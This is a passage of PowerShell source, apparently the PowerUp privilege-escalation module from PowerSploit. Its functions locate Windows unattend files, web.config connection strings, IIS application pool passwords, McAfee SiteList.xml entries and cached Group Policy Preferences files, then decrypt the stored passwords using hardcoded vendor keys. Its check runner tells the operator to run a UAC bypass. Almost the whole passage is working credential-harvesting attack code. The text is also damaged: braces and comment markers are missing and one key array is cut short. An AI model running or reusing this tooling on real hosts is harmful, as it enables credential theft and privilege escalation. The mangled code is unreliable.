(Join-Path $Env:WinDir "\Panther\Unattend\Unattended.xml"),
(Join-Path $Env:WinDir "\Panther\Unattend.xml"),
(Join-Path $Env:WinDir "\Panther\Unattend\Unattend.xml"),
(Join-Path $Env:WinDir "\System32\Sysprep\unattend.xml"),
(Join-Path $Env:WinDir "\System32\Sysprep\Panther\unattend.xml")
# test the existence of each path and return anything found
$SearchLocations | Where-Object { Test-Path $_ } | ForEach-Object {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'UnattendPath' $_
$ErrorActionPreference = $OrigError
function Get-WebConfig {
This script will recover cleartext and encrypted connection strings from all web.config
files on the system. Also, it will decrypt them if needed.
Author: Scott Sutherland - 2014, NetSPI
Author: Antti Rantasaari - 2014, NetSPI
This script will identify all of the web.config files on the system and recover the
connection strings used to support authentication to backend databases. If needed, the
script will also decrypt the connection strings on the fly. The output supports the
pipeline which can be used to convert all of the results into a pretty table by piping
to format-table.
Return a list of cleartext and decrypted connect strings from web.config files.
PS C:\> Get-WebConfig
user : s1admin
pass : s1password
dbserv :\server1
vdir : C:\test2
path : C:\test2\web.config
encr : No
user : s1user
pass : s1password
dbserv :\server1
vdir : C:\inetpub\wwwroot
path : C:\inetpub\wwwroot\web.config
encr : Yes
Return a list of clear text and decrypted connect strings from web.config files.
PS C:\>get-webconfig | Format-Table -Autosize
user pass dbserv vdir path encr
---- ---- ------ ---- ---- ----
s1admin s1password\server1 C:\App1 C:\App1\web.config No
s1user s1password\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No
s2user s2password\server2 C:\App2 C:\App2\test\web.config No
s2user s2password\server2 C:\App2 C:\App2\web.config Yes
s3user s3password\server3 D:\App3 D:\App3\web.config No
Below is an alterantive method for grabbing connection strings, but it doesn't support decryption.
for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\InetSRV\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("dbserv")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("path")
$Null = $DataTable.Columns.Add("encr")
# Get list of virtual directories in IIS
C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath |
ForEach-Object {
$CurrentVdir = $_
# Converts CMD style env vars (%) to powershell env vars (env)
if ($_ -like "*%*") {
$EnvarName = "`$Env:"+$_.split("%")[1]
$EnvarValue = Invoke-Expression $EnvarName
$RestofPath = $_.split("%")[2]
$CurrentVdir = $EnvarValue+$RestofPath
# Search for web.config files in each virtual directory
$CurrentVdir | Get-ChildItem -Recurse -Filter web.config | ForEach-Object {
# Set web.config path
$CurrentPath = $_.fullname
# Read the data from the web.config xml file
[xml]$ConfigFile = Get-Content $_.fullname
# Check if the connectionStrings are encrypted
if ($ConfigFile.configuration.connectionStrings.add) {
# Foreach connection string add to data table
ForEach-Object {
[String]$MyConString = $_.connectionString
if($MyConString -like "*password*") {
$ConfUser = $MyConString.Split("=")[3].Split(";")[0]
$ConfPass = $MyConString.Split("=")[4].Split(";")[0]
$ConfServ = $MyConString.Split("=")[1].Split(";")[0]
$ConfVdir = $CurrentVdir
$ConfPath = $CurrentPath
$ConfEnc = "No"
$Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ,$ConfVdir,$CurrentPath, $ConfEnc)
else {
# Find newest version of aspnet_regiis.exe to use (it works with older versions)
$AspnetRegiisPath = Get-ChildItem -Path "$Env:SystemRoot\Microsoft.NET\Framework\" -Recurse -filter 'aspnet_regiis.exe' | Sort-Object -Descending | Select-Object fullname -First 1
# Check if aspnet_regiis.exe exists
if (Test-Path ($AspnetRegiisPath.FullName)) {
# Setup path for temp web.config to the current user's temp dir
$WebConfigPath = (Get-Item $Env:temp).FullName + "\web.config"
# Remove existing temp web.config
if (Test-Path ($WebConfigPath)) {
Remove-Item $WebConfigPath
# Copy web.config from vdir to user temp for decryption
Copy-Item $CurrentPath $WebConfigPath
# Decrypt web.config in user temp
$AspnetRegiisCmd = $AspnetRegiisPath.fullname+' -pdf "connectionStrings" (get-item $Env:temp).FullName'
$Null = Invoke-Expression $AspnetRegiisCmd
# Read the data from the web.config in temp
[xml]$TMPConfigFile = Get-Content $WebConfigPath
# Check if the connectionStrings are still encrypted
if ($TMPConfigFile.configuration.connectionStrings.add) {
# Foreach connection string add to data table
$TMPConfigFile.configuration.connectionStrings.add | ForEach-Object {
[String]$MyConString = $_.connectionString
if($MyConString -like "*password*") {
$ConfUser = $MyConString.Split("=")[3].Split(";")[0]
$ConfPass = $MyConString.Split("=")[4].Split(";")[0]
$ConfServ = $MyConString.Split("=")[1].Split(";")[0]
$ConfVdir = $CurrentVdir
$ConfPath = $CurrentPath
$ConfEnc = 'Yes'
$Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ,$ConfVdir,$CurrentPath, $ConfEnc)
else {
Write-Verbose "Decryption of $CurrentPath failed."
else {
Write-Verbose 'aspnet_regiis.exe does not exist in the default location.'
# Check if any connection strings were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object user,pass,dbserv,vdir,path,encr | Select-Object user,pass,dbserv,vdir,path,encr -Unique
else {
Write-Verbose 'No connection strings found.'
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$ErrorActionPreference = $OrigError
function Get-ApplicationHost {
This script will recover encrypted application pool and virtual directory passwords from the applicationHost.config on the system.
This script will decrypt and recover application pool and virtual directory passwords
from the applicationHost.config file on the system. The output supports the
pipeline which can be used to convert all of the results into a pretty table by piping
to format-table.
Return application pool and virtual directory passwords from the applicationHost.config on the system.
PS C:\> Get-ApplicationHost
user : PoolUser1
pass : PoolParty1!
type : Application Pool
vdir : NA
apppool : ApplicationPool1
user : PoolUser2
pass : PoolParty2!
type : Application Pool
vdir : NA
apppool : ApplicationPool2
user : VdirUser1
pass : VdirPassword1!
type : Virtual Directory
vdir : site1/vdir1/
apppool : NA
user : VdirUser2
pass : VdirPassword2!
type : Virtual Directory
vdir : site2/
apppool : NA
Return a list of cleartext and decrypted connect strings from web.config files.
PS C:\> Get-ApplicationHost | Format-Table -Autosize
user pass type vdir apppool
---- ---- ---- ---- -------
PoolUser1 PoolParty1! Application Pool NA ApplicationPool1
PoolUser2 PoolParty2! Application Pool NA ApplicationPool2
VdirUser1 VdirPassword1! Virtual Directory site1/vdir1/ NA
VdirUser2 VdirPassword2! Virtual Directory site2/ NA
Author: Scott Sutherland - 2014, NetSPI
Version: Get-ApplicationHost v1.0
Comments: Should work on IIS 6 and Above
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")
# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
# Get application pool name
$PoolName = $_
# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd
# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd
# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /" | ForEach-Object {
# Get Virtual Directory Name
$VdirName = $_
# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd
# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd
# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$ErrorActionPreference = $OrigError
function Get-SiteListPassword {
Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
Based on Jerome Nokin (@funoverip)'s Python solution (in links).
PowerSploit Function: Get-SiteListPassword
Original Author: Jerome Nokin (@funoverip)
PowerShell Port: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
C:\Documents and Settings\, or C:\Users\. For any files found, the appropriate
credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
function that takes advantage of McAfee's static key encryption. Any decrypted credentials
are output in custom objects. See links for more information.
Optional path to a SiteList.xml file or folder.
PS C:\> Get-SiteListPassword
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName :
Path : Products/CommonUpdater
Name : McAfeeHttp
DecPassword : MyStrongPassword!
Enabled : 1
DomainName :
Server :
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Paris
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : paris001
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Tokyo
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : tokyo000
[Parameter(Position=0, ValueFromPipeline=$True)]
[ValidateScript({Test-Path -Path $_ })]
function Local:Get-DecryptedSitelistPassword {
# PowerShell adaptation of
# Original Author: Jerome Nokin (@funoverip / [email protected])
# port by @harmj0y
Param (
# make sure the appropriate assemblies are loaded
Add-Type -Assembly System.Security
Add-Type -Assembly System.Core
# declare the encoding/crypto providers we need
$Encoding = [System.Text.Encoding]::ASCII
$SHA1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
$3DES = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
# static McAfee key XOR key LOL
$XORKey = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
# xor the input b64 string with the static XOR key
$I = 0;
$UnXored = [System.Convert]::FromBase64String($B64Pass) | Foreach-Object { $_ -BXor $XORKey[$I++ % $XORKey.Length] }
# build the static McAfee 3DES key TROLOL
$3DESKey = $SHA1.ComputeHash($Encoding.GetBytes('<!@#$%^>')) + ,0x00*4
# set the options we need
$3DES.Mode = 'ECB'
$3DES.Padding = 'None'
$3DES.Key = $3DESKey
# decrypt the unXor'ed block
$Decrypted = $3DES.CreateDecryptor().TransformFinalBlock($UnXored, 0, $UnXored.Length)
# ignore the padding for the result
$Index = [Array]::IndexOf($Decrypted, [Byte]0)
if($Index -ne -1) {
$DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)])
else {
$DecryptedPass = $Encoding.GetString($Decrypted)
New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass}
function Local:Get-SitelistFields {
Param (
try {
[Xml]$SiteListXml = Get-Content -Path $Path
if($SiteListXml.InnerXml -Like "*password*") {
Write-Verbose "Potential password in found in $Path"
$SiteListXml.SiteLists.SiteList.ChildNodes | Foreach-Object {
try {
$PasswordRaw = $_.Password.'#Text'
if($_.Password.Encrypted -eq 1) {
# decrypt the base64 password if it's marked as encrypted
$DecPassword = if($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''}
else {
$DecPassword = $PasswordRaw
$Server = if($_.ServerIP) { $_.ServerIP } else { $_.Server }
$Path = if($_.ShareName) { $_.ShareName } else { $_.RelativePath }
$ObjectProperties = @{
'Name' = $_.Name;
'Enabled' = $_.Enabled;
'Server' = $Server;
'Path' = $Path;
'DomainName' = $_.DomainName;
'UserName' = $_.UserName;
'EncPassword' = $PasswordRaw;
'DecPassword' = $DecPassword;
New-Object -TypeName PSObject -Property $ObjectProperties
catch {
Write-Verbose "Error parsing node : $_"
catch {
Write-Warning "Error parsing file '$Path' : $_"
if($PSBoundParameters['Path']) {
$XmlFilePaths = $Path
else {
$XmlFilePaths = @('C:\Program Files\','C:\Program Files (x86)\','C:\Documents and Settings\','C:\Users\')
$XmlFilePaths | Foreach-Object { Get-ChildItem -Path $_ -Recurse -Include 'SiteList.xml' -ErrorAction SilentlyContinue } | Where-Object { $_ } | Foreach-Object {
Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'"
Get-SitelistFields -Path $_.Fullname
function Get-CachedGPPPassword {
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and left in cached files on the host.
PowerSploit Function: Get-CachedGPPPassword
Author: Chris Campbell (@obscuresec), local cache mods by @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and datasources.xml files and returns plaintext passwords.
PS C:\> Get-CachedGPPPassword
NewName : [BLANK]
Changed : {2013-04-25 18:36:07}
Passwords : {Super!!!Password}
UserNames : {SuperSecretBackdoor}
File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7
# Some XML issues between versions
Set-StrictMode -Version 2
# make sure the appropriate assemblies are loaded
Add-Type -Assembly System.Security
Add-Type -Assembly System.Core
# helper that decodes and decrypts password
function local:Get-DecryptedCpassword {
Param (
[string] $Cpassword
try {
# Append appropriate padding based on string length
$Mod = ($Cpassword.length % 4)
switch ($Mod) {
'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
'2' {$Cpassword += ('=' * (4 - $Mod))}
'3' {$Cpassword += ('=' * (4 - $Mod))}
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
# Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
# Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
catch {Write-Error $Error[0]}
# helper that parses fields from the found xml preference files
function local:Get-GPPInnerFields {
Param (
try {
$Filename = Split-Path $File -Leaf
[XML] $Xml = Get-Content ($File)
$Cpassword = @()
$UserName = @()
$NewName = @()
$Changed = @()
$Password = @()
# check for password field
if ($Xml.innerxml -like "*cpassword*"){
Write-Verbose "Potential password in $File"
switch ($Filename) {
'Groups.xml' {
$Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
'Services.xml' {
$Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
'Scheduledtasks.xml' {
$Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
'DataSources.xml' {
$Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
'Printers.xml' {
$Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
'Drives.xml' {
$Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
foreach ($Pass in $Cpassword) {
Write-Verbose "Decrypting $Pass"
$DecryptedPassword = Get-DecryptedCpassword $Pass
Write-Verbose "Decrypted a password of $DecryptedPassword"
#append any new passwords to array
$Password += , $DecryptedPassword
# put [BLANK] in variables
if (-not $Password) {$Password = '[BLANK]'}
if (-not $UserName) {$UserName = '[BLANK]'}
if (-not $Changed) {$Changed = '[BLANK]'}
if (-not $NewName) {$NewName = '[BLANK]'}
# Create custom object to output results
$ObjectProperties = @{'Passwords' = $Password;
'UserNames' = $UserName;
'Changed' = $Changed;
'NewName' = $NewName;
'File' = $File}
$ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
Write-Verbose "The password is between {} and may be more than one value."
if ($ResultsObject) {Return $ResultsObject}
catch {Write-Error $Error[0]}
try {
if($AllUsers -notmatch 'ProgramData') {
$AllUsers = "$AllUsers\Application Data"
# discover any locally cached GPP .xml files
$XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue
if ( -not $XMlFiles ) {
Write-Verbose 'No preference files found.'
else {
Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
ForEach ($File in $XMLFiles) {
Get-GppInnerFields $File.Fullname
catch {Write-Error $Error[0]}
function Invoke-AllChecks {
Runs all functions that check for various Windows privilege escalation opportunities.
Author: @harmj0y
License: BSD 3-Clause
Switch. Write a HTML version of the report to SYSTEM.username.html.
PS C:\> Invoke-AllChecks
Runs all escalation checks and outputs a status report for discovered issues.
PS C:\> Invoke-AllChecks -HTMLReport
Runs all escalation checks and outputs a status report to SYSTEM.username.html
detailing any discovered issues.
if($HTMLReport) {
$HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html"
$Header = "<style>"
$Header = $Header + "BODY{background-color:peachpuff;}"
$Header = $Header + "TABLE{border-width: 1px;border-style: solid;border-color: black;border-collapse: collapse;}"
$Header = $Header + "TH{border-width: 1px;padding: 0px;border-style: solid;border-color: black;background-color:thistle}"
$Header = $Header + "TD{border-width: 3px;padding: 0px;border-style: solid;border-color: black;background-color:palegoldenrod}"
$Header = $Header + "</style>"
ConvertTo-HTML -Head $Header -Body "<H1>PowerUp report for '$($Env:ComputerName).$($Env:UserName)'</H1>" | Out-File $HtmlReportFile
# initial admin checks
"`n[*] Running Invoke-AllChecks"
$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
"[+] Current user already has local administrative privileges!"
if($HTMLReport) {
ConvertTo-HTML -Head $Header -Body "<H2>User Has Local Admin Privileges!</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking if user is in a local group with administrative privileges..."
$CurrentUserSids = Get-CurrentUserTokenGroupSid | Select-Object -ExpandProperty SID
if($CurrentUserSids -contains 'S-1-5-32-544') {
"[+] User is in a local group that grants administrative privileges!"
"[+] Run a BypassUAC attack to elevate privileges to admin."
if($HTMLReport) {
ConvertTo-HTML -Head $Header -Body "<H2> User In Local Group With Administrative Privileges</H2>" | Out-File -Append $HtmlReportFile
# Service checks
"`n`n[*] Checking for unquoted service paths..."
$Results = Get-ServiceUnquoted
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Unquoted Service Paths</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking service executable and argument permissions..."
$Results = Get-ModifiableServiceFile
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Service File Permissions</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking service permissions..."
$Results = Get-ModifiableService
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Modifiable Services</H2>" | Out-File -Append $HtmlReportFile
# registry checks
"`n`n[*] Checking for Autologon credentials in registry..."
$Results = Get-RegistryAutoLogon
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Registry Autologons</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking for modifidable registry autoruns and configs..."
$Results = Get-ModifiableRegistryAutoRun
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Registry Autoruns</H2>" | Out-File -Append $HtmlReportFile
# other checks
"`n`n[*] Checking for modifiable schtask files/configs..."
$Results = Get-ModifiableScheduledTaskFile
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Modifidable Schask Files</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking for unattended install files..."
$Results = Get-UnattendedInstallFile
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Unattended Install Files</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking for encrypted web.config strings..."
$Results = Get-Webconfig | Where-Object {$_}
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Encrypted 'web.config' String</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking for encrypted application pool and virtual directory passwords..."
$Results = Get-ApplicationHost | Where-Object {$_}
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Encrypted Application Pool Passwords</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking for plaintext passwords in McAfee SiteList.xml files...."
$Results = Get-SiteListPassword | Where-Object {$_}
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>McAfee's SiteList.xml's</H2>" | Out-File -Append $HtmlReportFile
"`n`n[*] Checking for cached Group Policy Preferences .xml files...."
$Results = Get-CachedGPPPassword | Where-Object {$_}
$Results | Format-List
if($HTMLReport) {
$Results | ConvertTo-HTML -Head $Header -Body "<H2>Cached GPP Files</H2>" | Out-File -Append $HtmlReportFile
if($HTMLReport) {
"[*] Report written to '$HtmlReportFile' `n"
# PSReflect signature specifications
$Module = New-InMemoryModule -ModuleName PowerUpModule
$FunctionDefinitions = @(
(func kernel32 GetCurrentProcess ([IntPtr]) @())
(func advapi32 OpenProcessToken ([Bool]) @( [IntPtr], [UInt32], [IntPtr].MakeByRefType()) -SetLastError)
(func advapi32 GetTokenInformation ([Bool]) @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32].MakeByRefType()) -SetLastError),
(func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),
(func advapi32 QueryServiceObjectSecurity ([Bool]) @([IntPtr], [Security.AccessControl.SecurityInfos], [Byte[]], [UInt32], [UInt32].MakeByRefType()) -SetLastError),
(func advapi32 ChangeServiceConfig ([Bool]) @([IntPtr], [UInt32], [UInt32], [UInt32], [String], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) -SetLastError -Charset Unicode),
(func advapi32 CloseServiceHandle ([Bool]) @([IntPtr]) -SetLastError)
$ServiceAccessRights = psenum $Module PowerUp.ServiceAccessRights UInt32 @{
QueryConfig = '0x00000001'
ChangeConfig = '0x00000002'
QueryStatus = '0x00000004'
EnumerateDependents = '0x00000008'
Start = '0x00000010'
Stop = '0x00000020'
PauseContinue = '0x00000040'
Interrogate = '0x00000080'
UserDefinedControl = '0x00000100'
Delete = '0x00010000'
ReadControl = '0x00020000'
WriteDac = '0x00040000'
WriteOwner = '0x00080000'
Synchronize = '0x00100000'
AccessSystemSecurity = '0x01000000'
GenericAll = '0x10000000'
GenericExecute = '0x20000000'
GenericWrite = '0x40000000'
GenericRead = '0x80000000'
AllAccess = '0x000F01FF'
} -Bitfield
$SidAttributes = psenum $Module PowerUp.SidAttributes UInt32 @{
SE_GROUP_ENABLED = '0x00000004'
SE_GROUP_INTEGRITY = '0x00000020'
SE_GROUP_MANDATORY = '0x00000001'
SE_GROUP_OWNER = '0x00000008'
SE_GROUP_RESOURCE = '0x20000000'
} -Bitfield
$SID_AND_ATTRIBUTES = struct $Module PowerUp.SidAndAttributes @{
Sid = field 0 IntPtr
Attributes = field 1 UInt32
$TOKEN_GROUPS = struct $Module PowerUp.TokenGroups @{
GroupCount = field 0 UInt32
Groups = field 1 $SID_AND_ATTRIBUTES.MakeArrayType() -MarshalAs @('ByValArray', 32)
$Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace 'PowerUp.NativeMethods'
$Advapi32 = $Types['advapi32']
$Kernel32 = $Types['kernel32']
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